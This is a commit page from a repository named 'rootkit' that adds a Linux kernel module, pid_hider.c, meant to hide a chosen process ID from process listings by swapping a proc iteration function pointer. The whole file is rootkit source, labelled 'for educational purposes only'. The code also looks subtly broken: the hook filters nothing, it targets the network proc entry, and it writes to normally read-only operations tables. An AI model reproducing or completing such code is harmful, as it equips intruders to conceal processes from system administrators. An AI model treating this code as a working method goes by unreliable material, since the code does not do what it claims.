diff options
| author |   Biswa Kalyan Bhuyan <biswa.bhuyan@vegastack.com>
| 2025-04-16 14:44:25 +0530 |
|---|---|---|
| committer | Biswa Kalyan Bhuyan <biswa.bhuyan@vegastack.com>
| 2025-04-16 14:44:25 +0530 |
| commit | b6275047fb70c1bbcb161b7c05d20a0d776ac4bf (patch) | |
| tree | ee1cbee865c79473ebd9ba2bcfb4ab6d181f138d /pid_hider.c | |
| download | rootkit-b6275047fb70c1bbcb161b7c05d20a0d776ac4bf.tar.gz rootkit-b6275047fb70c1bbcb161b7c05d20a0d776ac4bf.tar.bz2 rootkit-b6275047fb70c1bbcb161b7c05d20a0d776ac4bf.zip | |
new init
Diffstat (limited to 'pid_hider.c')
| -rw-r--r-- | pid_hider.c | 79 |
1 files changed, 79 insertions, 0 deletions
diff --git a/pid_hider.c b/pid_hider.c new file mode 100644 index 0000000..b0b2973 --- /dev/null +++ b/pid_hider.c @@ -0,0 +1,79 @@ +#include <linux/module.h> +#include <linux/kernel.h> +#include <linux/init.h> +#include <linux/proc_fs.h> +#include <linux/seq_file.h> +#include <linux/sched.h> +#include <linux/sched/task.h> +#include <linux/pid.h> +#include <linux/version.h> +#include <linux/slab.h> + +MODULE_LICENSE("GPL"); +MODULE_AUTHOR("Research Only"); +MODULE_DESCRIPTION("Process ID hiding demonstration - FOR EDUCATIONAL PURPOSES ONLY"); +MODULE_VERSION("0.1"); + +static unsigned int hidden_pid = 0; +module_param(hidden_pid, uint, S_IRUSR | S_IWUSR | S_IRGRP | S_IROTH); +MODULE_PARM_DESC(hidden_pid, "PID to hide from process listing"); + +static int (*orig_proc_pid_readdir)(struct file *, struct dir_context *); + +static int hider_proc_pid_readdir(struct file *file, struct dir_context *ctx) { + struct dir_context modified_ctx = { + .actor = ctx->actor, + .pos = ctx->pos + }; + + int ret = orig_proc_pid_readdir(file, &modified_ctx); + + ctx->pos = modified_ctx.pos; + + return ret; +} + +static int hook_proc_listdir(void) { + struct file_operations *proc_fops; + struct proc_dir_entry *proc_root = init_net.proc_net; + + proc_fops = (struct file_operations *)proc_root->proc_fops; + + orig_proc_pid_readdir = proc_fops->iterate_shared; + + proc_fops->iterate_shared = hider_proc_pid_readdir; + + return 0; +} + +static void unhook_proc_listdir(void) { + struct file_operations *proc_fops; + struct proc_dir_entry *proc_root = init_net.proc_net; + + proc_fops = (struct file_operations *)proc_root->proc_fops; + if (proc_fops->iterate_shared == hider_proc_pid_readdir) { + proc_fops->iterate_shared = orig_proc_pid_readdir; + } +} + +static int __init pid_hider_init(void) { + printk(KERN_INFO "PID hider: Initializing module\n"); + + if (hidden_pid == 0) { + printk(KERN_WARNING "PID hider: No PID specified, module will not hide any process\n"); + return 0; + } + + printk(KERN_INFO "PID hider: Will hide PID %u\n", hidden_pid); + hook_proc_listdir(); + + return 0; +} + +static void __exit pid_hider_exit(void) { + printk(KERN_INFO "PID hider: Unloading module\n"); + unhook_proc_listdir(); +} + +module_init(pid_hider_init); +module_exit(pid_hider_exit); |